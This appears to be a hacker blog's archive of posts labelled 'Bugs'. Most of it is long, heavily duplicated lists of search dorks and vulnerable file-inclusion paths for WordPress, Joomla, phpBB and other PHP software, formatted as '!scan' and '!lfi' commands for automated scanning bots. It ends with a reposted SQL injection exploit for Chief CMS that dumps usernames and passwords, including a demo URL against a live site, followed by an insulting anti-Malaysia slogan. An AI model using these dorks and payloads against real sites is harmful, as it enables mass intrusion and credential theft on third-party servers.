Showing posts with label Bugs. Show all posts
Showing posts with label Bugs. Show all posts
Sunday, January 27, 2013
Dork thimthumb 2012
wp-content/pluginswp-marketplace/libs/timthumb.php
wp-content/pluginswp-mobile-detector/timthumb.php
wp-content/pluginswp-pagenavi/functions/timthumb.php
wp-content/pluginswp-pagenavi/inc/timthumb.php
wp-content/pluginswp-pagenavi/scripts/timthumb.phps
wp-content/pluginswp-pagenavi/timthumb.php
wp-content/pluginswps3slider/scripts/timthumb.php
wp-content/pluginswp-slick-slider/includes/timthumb/timthumb.php
wp-content/pluginswptap-news-press-themeplugin-for-iphone/include/timthumb.php
wp-content/pluginswp-thumbie/timthumb.php
wp-content/plugins/yd-export2email/timthumb.php
wp-content/plugins/yd-recent-posts-widget/timthumb/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
wp-content/pluginswp-pagenavi/timthumb.php
wp-content/pluginswp-pagenavi/inc/timthumb.php
wp-content/pluginswp-pagenavi/functions/timthumb.php
wp-content/pluginswp-pagenavi/scripts/timthumb.php
wp-content/themes/canvas/timthumb.php
wp-content/themes/TheStyle/timthumb.php
Monday, January 31, 2011
bugs xml
!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
Thursday, January 27, 2011
dork lfi
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
Saturday, January 22, 2011
dork&bug
!scan /ws/login.php?includedir= WebCalendar
!scan /ws/login.php?includedir= WebCalendar v0.9.45
!scan ocp-103/index.php?req_path= ocPortal
!scan images/evil.php?owned= e107
!scan index.php?module=PostWrap&page= PostNuke PostWrap
!scan mcNews/admin/header.php?skinfile= mcNews
!scan inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan zboard/zboard.php?id= Zeroboard
!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez
!scan include/SQuery/gameSpy2.php?libpath= intitle:"Autonomous LAN party"
!scan event.php?myevent_path= MyEvent
!scan index.php?page= "Internet PhotoShow"
!scan mod/authent.php4?rootpath= RechnungsZentrale
!scan about.php?DFORUM_PATH= dForum
!scan post.php?DFORUM_PATH= dForum
!scan movie_cls.php?full_path= Built2Go
!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb"
!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
!scan /master.php?root_path= inurl:/system/article/alltopics.php
!scan /master.php?root_path= inurl:/system/user/index.php
!scan includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"
!scan /classes/adodbt/sql.php?classes_dir= "powered By Limbo CMS"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan agenda.php3?rootagenda= "Powered by phpMyAgenda"
!scan agenda2.php3?rootagenda= "Powered by phpMyAgenda"
!scan show.php?path= inurl:"fclick.php?"
!scan eshow.php?Config_rootdir= "powered by Albinator"
!scan auction/auction_common.php?phpbb_root_path= intext:"phpbb - auction"
!scan auction/auction_common.php?phpbb_root_path= inurl:auction
!scan visible_count_inc.php?statitpath= inurl:visible
!scan index.php?inc_dir= "Powered by TotalCalendar"
!scan /phpdig/includes/config.php?relative_script_path= "JetBox CMS"
!scan embed/day.php?path= intitle:"Login to Calendar"
!scan includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan claroline/auth/ldap/authldap.php?includePath= Dokeos
!scan /direct.php?rf= "ActualScripts, Company. All rights reserved."
!scan /config.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan addsite.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan auth/auth.php?phpbb_root_path= phpRaid
!scan auth/auth_phpbb/phpbb_root_path= phpRaid
!scan includes/pafiledb_constants.php?module_root_path= PafileDB
!scan /ws/login.php?includedir= WebCalendar v0.9.45
!scan ocp-103/index.php?req_path= ocPortal
!scan images/evil.php?owned= e107
!scan index.php?module=PostWrap&page= PostNuke PostWrap
!scan mcNews/admin/header.php?skinfile= mcNews
!scan inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan zboard/zboard.php?id= Zeroboard
!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez
!scan include/SQuery/gameSpy2.php?libpath= intitle:"Autonomous LAN party"
!scan event.php?myevent_path= MyEvent
!scan index.php?page= "Internet PhotoShow"
!scan mod/authent.php4?rootpath= RechnungsZentrale
!scan about.php?DFORUM_PATH= dForum
!scan post.php?DFORUM_PATH= dForum
!scan movie_cls.php?full_path= Built2Go
!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:"toplist.php" "powered by phpbb"
!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
!scan /master.php?root_path= inurl:/system/article/alltopics.php
!scan /master.php?root_path= inurl:/system/user/index.php
!scan includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"
!scan /classes/adodbt/sql.php?classes_dir= inurl:"index2.php?option=rss"
!scan /classes/adodbt/sql.php?classes_dir= "powered By Limbo CMS"
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"
!scan agenda.php3?rootagenda= "Powered by phpMyAgenda"
!scan agenda2.php3?rootagenda= "Powered by phpMyAgenda"
!scan show.php?path= inurl:"fclick.php?"
!scan eshow.php?Config_rootdir= "powered by Albinator"
!scan auction/auction_common.php?phpbb_root_path= intext:"phpbb - auction"
!scan auction/auction_common.php?phpbb_root_path= inurl:auction
!scan visible_count_inc.php?statitpath= inurl:visible
!scan index.php?inc_dir= "Powered by TotalCalendar"
!scan /phpdig/includes/config.php?relative_script_path= "JetBox CMS"
!scan embed/day.php?path= intitle:"Login to Calendar"
!scan includes/dbal.php?eqdkp_root_path= "powered by EQdkp"
!scan claroline/auth/ldap/authldap.php?includePath= Dokeos
!scan /direct.php?rf= "ActualScripts, Company. All rights reserved."
!scan /config.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan addsite.php?returnpath= "PHPListPro ?2001-2006 SmartISoft"
!scan auth/auth.php?phpbb_root_path= phpRaid
!scan auth/auth_phpbb/phpbb_root_path= phpRaid
!scan includes/pafiledb_constants.php?module_root_path= PafileDB
dork
!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro
!scan ?custompluginfile%5B%5D= Subdreamer categoryid
!scan ?custompluginfile%5B%5D= "Website Powered by Subdreamer"
!scan include/lib.inc.php?site_path= rgboard
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "/includes/mambo.php"
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "mambo/index.php"
!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?
!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php
!scan playing.php/common/db.php?commonpath= inurl:"playing.php"
!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0" "Powered by phpBB 2.0"+org "Powered by phpBB 2.0" "Powered by phpBB 2.0"+hk
!scan errors.php?error= "index of" errors.php
!scan index.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan index2.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan mainbody.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan editsite.php?returnpath= "editsite.php"
!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=
!scan files/carprss.php?CarpPath= "by SiteBuilder Elite"
!scan accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by IceWarp Software Merak Email Server" IceWarp Web Mail 5.4
!scan config.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= event(s) today "All Upcoming Events"
!scan ws/login.php?noSet=0&includedir= "Public Access (Login)" WebCalendar
!scan vwar/convert/mvcw.php?step=1&vwar_root= "de/vwar"
!scan protection.php?action=logout&siteurl= "approved by TheFanlistings.org"
!scan ?mosConfig_absolute_path= "Free Software released under the GNU/GPL License"
!scan ?mosConfig_absolute_path= Joomla Template by
!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= "All trademarks and copyrights on this page are owned by their respective owners" Geeklog
!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= "Powered By GeekLog" "Created this page in" seconds
!scan admin.php?include_path= "Teken het gastenboek" Onderhoud
!scan includes/db_connect.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"
!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u
!scan index.php?a= ".de/index.php?a="
!scan index.php?skin_file= "Powered by Mp3ToolBox
!scan index.php?filename= "35mm Slide Gallery 6.0"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "/members.php?id=all" >> mulai
!scan protection.php?action=logout&siteurl= "/members.php?id=all"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "ID" "Name" "Email" "URL"
!scan accueil.php?menu= "asso.fr/accueil.php?menu="
!scan comments-display-tpl.php?config[comments_form_tpl]= "Powered By TalkBack"
!scan ?custompluginfile%5B%5D= Subdreamer categoryid
!scan ?custompluginfile%5B%5D= "Website Powered by Subdreamer"
!scan include/lib.inc.php?site_path= rgboard
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "/includes/mambo.php"
!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "mambo/index.php"
!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?
!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php
!scan playing.php/common/db.php?commonpath= inurl:"playing.php"
!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0" "Powered by phpBB 2.0"+org "Powered by phpBB 2.0" "Powered by phpBB 2.0"+hk
!scan errors.php?error= "index of" errors.php
!scan index.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan index2.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan mainbody.php?option=com_custompages&cpage= inurl:"com_custompages"
!scan editsite.php?returnpath= "editsite.php"
!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=
!scan files/carprss.php?CarpPath= "by SiteBuilder Elite"
!scan accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by IceWarp Software Merak Email Server" IceWarp Web Mail 5.4
!scan config.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= home "post ad" "post event" "post image"
!scan ipblock.inc.php?path_escape= event(s) today "All Upcoming Events"
!scan ws/login.php?noSet=0&includedir= "Public Access (Login)" WebCalendar
!scan vwar/convert/mvcw.php?step=1&vwar_root= "de/vwar"
!scan protection.php?action=logout&siteurl= "approved by TheFanlistings.org"
!scan ?mosConfig_absolute_path= "Free Software released under the GNU/GPL License"
!scan ?mosConfig_absolute_path= Joomla Template by
!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= "All trademarks and copyrights on this page are owned by their respective owners" Geeklog
!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= "Powered By GeekLog" "Created this page in" seconds
!scan admin.php?include_path= "Teken het gastenboek" Onderhoud
!scan includes/db_connect.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"
!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u
!scan index.php?a= ".de/index.php?a="
!scan index.php?skin_file= "Powered by Mp3ToolBox
!scan index.php?filename= "35mm Slide Gallery 6.0"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "/members.php?id=all" >> mulai
!scan protection.php?action=logout&siteurl= "/members.php?id=all"
!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "ID" "Name" "Email" "URL"
!scan accueil.php?menu= "asso.fr/accueil.php?menu="
!scan comments-display-tpl.php?config[comments_form_tpl]= "Powered By TalkBack"
joomla bug
/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite
bug dork php bb
path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
Label:
Bugs
bug rfi 2009,2010
.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”
Tuesday, September 15, 2009
Chief Content Management System
##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-
##############################################################
[ Software Information ]
[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"
##############################################################
[ Vulnerable File ]
[ Exploit ]
-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--
[ Demo ]
http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--
##############################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!
[ NOTE ]
This is My birthday i am 18 !!
[ QUOTE ]
"Ini dadaku, mana dadamu?
Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer
Soekarno, 1963”
Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"
FUCK MALAYSIA !!!
# www.indonesiancoder.com
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-
##############################################################
[ Software Information ]
[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"
##############################################################
[ Vulnerable File ]
http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]
[ Exploit ]
-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--
[ Demo ]
http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--
##############################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!
[ NOTE ]
This is My birthday i am 18 !!
[ QUOTE ]
"Ini dadaku, mana dadamu?
Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer
Soekarno, 1963”
Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"
FUCK MALAYSIA !!!
# www.indonesiancoder.com
Label:
Bugs
Clicknet CMS v2.1 Remote File Inclusion
################################################################
